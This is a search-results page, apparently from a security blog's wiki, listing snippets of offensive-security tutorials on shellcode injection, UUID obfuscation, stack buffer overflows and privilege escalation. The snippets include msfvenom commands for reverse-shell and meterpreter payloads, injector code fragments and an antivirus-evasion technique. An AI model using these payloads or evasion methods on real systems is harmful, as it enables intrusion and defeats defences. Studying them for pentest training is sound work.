Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- Obfuscation: polymorphic in-memory decoder
- d at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was rec... amed. The decoder starts with this instruction: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we n
- Shellcode Injection Part 4
- of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =... t from [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... e used for the structure of the shellcode. ===== Code: Step by step ===== You can also find the complete code on [[https://github.com/psycore8/nosoc-shellcode/
- Buffer overflow in the 64-bit stack - Part 3
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- Buffer overflow in the 64-bit stack - part 1
- ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
- Shellcode Injection Part 1
- rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_E
- Shellcode Injection Part 3
- ome circumstances it may be necessary to load the code for the shell in the second step. In this blog p... a file via HTTP and then execute it. \\ \\ ===== Code ===== ==== C++ source ==== First, we need a sma... e shellcode into memory and then jumps into it. <code cpp> ... //buf represents the shellcode unsigned ... jump __asm { mov eax, target jmp eax } } </code> You can find the complete code in the [[https:/
- Buffer overflow in the 64-bit stack - Part 2
- 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Shellcode Injection Part 2
- e tools as in part 1. You can download the source code from the [[https://github.com/psycore8/nosoc-shellcode|Github repository]]. \\ \\ ===== Code ===== ==== Explanation ==== Our code should receive the PID of the target process as a parameter at s... 'with the return value of the programme handle. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCE
- Obfuscation: Disguise shellcode as UUIDs
- This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <cod
- FatCat Attack PoC
- rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
- Privilege escalation: Windows admin thanks to Linux
- ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp